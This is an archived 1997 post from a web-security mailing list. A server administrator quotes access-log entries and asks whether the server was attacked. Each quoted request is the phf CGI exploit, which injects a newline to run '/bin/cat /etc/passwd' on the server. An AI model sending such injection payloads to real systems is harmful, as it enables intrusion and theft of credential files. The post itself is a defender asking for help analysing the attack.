[5129] in WWW Security List Archive

home help back first fref pref prev next nref lref last post

What's this ?

daemon@ATHENA.MIT.EDU (Chung-Rui Kao)
Wed Apr 16 23:30:33 1997

Date: Wed, 16 Apr 1997 18:55:18 +0800
From: Chung-Rui Kao <kaoc@hep3.phys.sinica.edu.tw>
To: www-security@ns2.rutgers.edu
Errors-To: owner-www-security@ns2.rutgers.edu


  Dear Sir:

    What does it mean ? if you find such messages in your access_log..
    ps. my httpd is the NCSA version.

ip014.dialup.ntu.edu.tw - - [30/Jan/1997:18:50:58 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 644
ip010.dialup.ntu.edu.tw - - [01/Feb/1997:10:57:35 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 677
ogg081-025.resnet.wisc.edu - - [22/Feb/1997:01:21:32 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 681
192.192.98.116 - - [27/Mar/1997:19:17:43 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 759

    Besides, I hope to know how can I prove whether there is someone who
    tried to hack or had hacked my WWWW server?? My old httpd was the NCSA
    HTTPd 1.3. As the document in the NCSA's offical site, it said there's
    control codes in the access then there's someone attend to hack your server.
    There's no any control code in my access_log file, but I doubt someone
    hacked my server through the httpd daemon, and I hope someone can help me 
    to prove that.

    Thank you.
    4/16'97

home help back first fref pref prev next nref lref last post